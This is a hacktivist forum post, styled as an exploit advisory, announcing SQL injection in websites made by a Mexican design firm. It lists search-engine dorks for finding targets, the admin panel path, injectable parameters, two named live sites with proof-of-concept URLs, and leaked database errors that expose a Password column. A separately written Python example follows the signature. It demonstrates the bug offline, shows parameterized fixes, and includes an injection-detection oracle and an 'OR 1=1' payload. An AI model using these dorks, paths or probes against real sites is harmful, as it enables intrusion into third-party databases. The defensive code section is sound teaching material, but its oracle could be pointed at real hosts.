Topic: Designed by Logiprint Estratégica Mexico SQL Inj Vuln
KingSkrupellos
Hacktivist
Member since: 21.08.2013

Post #1
Designed by Logiprint Estratégica Mexico SQL Inj Vuln
14.09.2018 05:59
#################################################################################################

# Exploit Title : Designed by Logiprint Estratégica Mexico SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 14/09/2018
# Vendor Homepage : logiprint.com.mx
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:"Designed by Logiprint Estratégica"

intext:"Copyright © 2016 Designed by Logiprint Estratégica"

# Admin Login Panel Path => /mi_cuenta/

# Exploit :

/shop-sidebar.php?idcategoria=[SQL Injection]

/shop-product-detail2.php?idproducto=&idcategoria=[SQL Injection]

/shop-product-detail2.php?idproducto=[ID-Number]&idpadre=&idcategoria=[SQL Injection]

/directorio.php?records_per_page=[ID-Number]&p=[ID-Number]&texto_buscar=&primer=[ID-Number]&segundo=[ID-Number]&tercer=[SQL Injection]

#################################################################################################

# Example Sites =>

platoro.com.mx/shop-sidebar.php?idcategoria=8%27 => [ Proof of Concept ] => archive.is/6ZrBZ

galeriajoyera.com.mx/directorio.php?records_per_page=96&p=1&texto_buscar=&primer=5&segundo=2&tercer=24%27 => [ Proof of Concept ] => archive.is/hIMNh

# SQL Database Errors =>

Error: [SELECT idcategorias, idpadre, nombreesp, nombreing, descripcion, imagen, orden, activo FROM logiprint_ultimascate WHERE idcategorias=8' ORDER BY orden ASC]
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY orden ASC' at line 1

Error: [SELECT idbanner, imagenesp, imagening, idcategorias, nombre, publicado FROM logiprint_banner WHERE idcategorias = ]
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND activo=1 ORDER BY local ASC' at line 1

Error: [SELECT iddirectorio, nombrecomercial, logo, imgpublica, img1, img2, img3, idpiso, local, idmetal, idcategorias, telefono, telefono1, telefonomovil, paginaweb, emailcontacto, Password, urlf, urlt, urlg, urli, urly, urlp, urlv, describ, activo FROM logiprint_directorio WHERE iddirectorio IN(96,97,161) AND iddirectorio IN(3,6,8,10,16,25,30,33,47,53,55,56,81,88,90,91,92,95,100,101,104,105,111,112,113,116,117,124,127,130,135,139,140,145,148,150,151,176,177,181,182) AND iddirectorio IN() AND activo=1 ORDER BY local ASC LIMIT 0, 96 ]
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND activo=1 ORDER BY local ASC LIMIT 0, 96' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

We don't care what people think about us; we are proud of ourselves and we are not going to change for anyone. I do not have my own website. No contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.
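The leaked query `... WHERE idcategorias=8' ORDER BY orden ASC` shows what the bug looks like from the database side: the raw `idcategoria` value is spliced into the SQL text unquoted, and the fourth error (`iddirectorio IN()`) shows the same thing happening to a list parameter on directorio.php. The block below is an added example, not code from the post above and not Logiprint's own PHP (which is not on the page). `vulnerable_lookup()` is an assumed reconstruction of the concatenation pattern the error implies, `safe_lookup()` and `in_clause()` are the hardened forms, and `numeric_injection_check()` is the three-request oracle that turns the page's single-quote PoC into a repeatable test. SQLite stands in for MySQL, the table rows are constructed, and the `render_*_page()` functions are stand-ins for the remote page so everything runs offline; all function names are hypothetical.

```python
import re
import sqlite3

# Column list taken from the leaked query on the page.
COLUMNS = ("idcategorias, idpadre, nombreesp, nombreing, descripcion, "
           "imagen, orden, activo")

# Constructed sample rows (made up for this example, not data from any site).
SAMPLE_ROWS = [
    (8, 0, "Anillos", "Rings", "", "anillos.jpg", 2, 1),
    (9, 0, "Collares", "Necklaces", "", "collares.jpg", 1, 1),
    (10, 8, "Oro", "Gold", "", "oro.jpg", 3, 0),
]

# The string the real site leaks into the response body (see the post).
MYSQL_ERROR = "You have an error in your SQL syntax"

DECIMAL_ID = re.compile(r"[0-9]{1,10}")


def make_db():
    """In-memory SQLite stand-in for the site's MySQL table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE logiprint_ultimascate (idcategorias INTEGER, idpadre INTEGER, "
        "nombreesp TEXT, nombreing TEXT, descripcion TEXT, imagen TEXT, "
        "orden INTEGER, activo INTEGER)"
    )
    conn.executemany(
        "INSERT INTO logiprint_ultimascate VALUES (?,?,?,?,?,?,?,?)", SAMPLE_ROWS
    )
    return conn


def vulnerable_lookup(conn, idcategoria):
    """Assumed reconstruction of the bug: the raw GET value is spliced into the
    SQL text, so 8' becomes ...idcategorias=8' ORDER BY... exactly as leaked."""
    sql = (f"SELECT {COLUMNS} FROM logiprint_ultimascate "
           f"WHERE idcategorias={idcategoria} ORDER BY orden ASC")
    return conn.execute(sql).fetchall()


def safe_lookup(conn, idcategoria):
    """Hardened form: whitelist the id as a decimal integer, then bind it."""
    if not DECIMAL_ID.fullmatch(idcategoria):
        raise ValueError("idcategoria must be a decimal integer")
    sql = (f"SELECT {COLUMNS} FROM logiprint_ultimascate "
           "WHERE idcategorias=? ORDER BY orden ASC")
    return conn.execute(sql, (int(idcategoria),)).fetchall()


def in_clause(column, raw_values):
    """Build `column IN (?,?,...)` with bound integers (column is a trusted
    literal, never user input). An empty or malformed list is refused up front:
    MySQL rejects `IN()` with exactly the syntax error seen in the fourth leaked
    query, and a broken filter must fail closed rather than widen a result set."""
    if not raw_values or not all(DECIMAL_ID.fullmatch(v) for v in raw_values):
        raise ValueError(f"{column}: list must be non-empty decimal integers")
    ids = [int(v) for v in raw_values]
    return f"{column} IN ({','.join('?' * len(ids))})", ids


def render_vulnerable_page(conn, idcategoria):
    """Constructed stand-in for the remote page: a failed query leaks a MySQL-style
    error into the body, which is what makes the bug detectable error-based."""
    try:
        rows = vulnerable_lookup(conn, idcategoria)
    except sqlite3.OperationalError as exc:
        return f"Error: {MYSQL_ERROR}; check the manual ... ({exc})"
    return "\n".join(row[2] for row in rows)


def render_safe_page(conn, idcategoria):
    """Same page on top of safe_lookup(): malformed ids get a 400, never a DB error."""
    try:
        rows = safe_lookup(conn, idcategoria)
    except ValueError:
        return "400 Bad Request"
    return "\n".join(row[2] for row in rows)


def numeric_injection_check(fetch, base_id):
    """Three-request oracle for an integer parameter, driven through fetch(value)
    so it works against the stand-in here or a real HTTP client:
      base        -> renders normally (baseline)
      base + "'"  -> DB syntax error leaks (the quote reached the SQL parser)
      base + "-0" -> identical to baseline (the DB evaluated our arithmetic)
    Both signals together show the value is spliced into SQL unquoted."""
    baseline = fetch(str(base_id))
    quoted = fetch(f"{base_id}'")
    arithmetic = fetch(f"{base_id}-0")
    return {
        "error_on_quote": MYSQL_ERROR in quoted,
        "arithmetic_evaluated": MYSQL_ERROR not in baseline and arithmetic == baseline,
    }


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", numeric_injection_check(lambda v: render_vulnerable_page(db, v), 8))
    print("hardened:  ", numeric_injection_check(lambda v: render_safe_page(db, v), 8))
    print("boolean payload rows:", len(vulnerable_lookup(db, "0 OR 1=1")))
```

Against the stand-in, the vulnerable page answers the oracle with both signals true and returns every category for `0 OR 1=1`; the hardened page answers 400 to both probe values, so neither signal fires. The `-0` probe matters because an error on a lone quote can also come from a WAF or a generic exception handler; only the arithmetic match proves the database itself parsed the input.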